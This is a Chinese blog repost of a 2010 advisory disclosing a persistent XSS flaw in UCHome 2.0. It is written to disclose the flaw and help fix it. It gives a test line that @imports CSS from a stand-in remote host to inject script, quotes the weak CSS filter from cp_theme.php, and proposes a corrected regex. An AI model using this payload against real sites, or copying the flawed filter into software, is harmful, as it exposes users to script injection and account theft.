博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
uchome 2.0 存在持久XSS漏洞
阅读量:5238 次
发布时间:2019-06-14

本文共 719 字,大约阅读时间需要 2 分钟。

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.

@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.

分析代码 cp_theme.php 92行(17行调用)

function checksecurity($str) {	//执行一系列的过滤验证是否合法的CSS	$filter = array(		'//*[]*(.+?)[]**//is',		'/[^a-z0-9]+/i',	);	$str = preg_replace($filter, '', $str); //过滤是过滤了,但只用于判断,没对源输入起作用	if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进行检测		showmessage('css_contains_elements_of_insecurity');	}	return true;}

安全建议:

临时解决方法

implode应该是import的笔误

/(expression|vbscript|javascript|import)/i

转载于:https://www.cnblogs.com/52php/p/5658205.html

你可能感兴趣的文章
Dreamweaver cc新版本css单行显示
查看>>
【android】安卓的权限提示及版本相关
查看>>
JavaScript可否多线程? 深入理解JavaScript定时机制
查看>>
IOS基础学习
查看>>
PHP 导出 Excell
查看>>
Java基础教程——网络基础知识
查看>>
Kruskal基础最小生成树
查看>>
ubuntu 14.04 安装搜狗拼音输入法
查看>>
浅谈算法和数据结构: 一 栈和队列
查看>>
Java内部类详解
查看>>
【hdu 1429】胜利大逃亡(续)
查看>>
图论-次短路求法
查看>>
What's New for Visual C# 6.0
查看>>
ExtJs学习笔记之ComboBox组件
查看>>
关于收费软件
查看>>
getopt_long
查看>>
TensorFlow MNIST CNN 代码
查看>>
javascript之Style物
查看>>
JSON跨域解决方案收集
查看>>
SSH框架整合总结
查看>>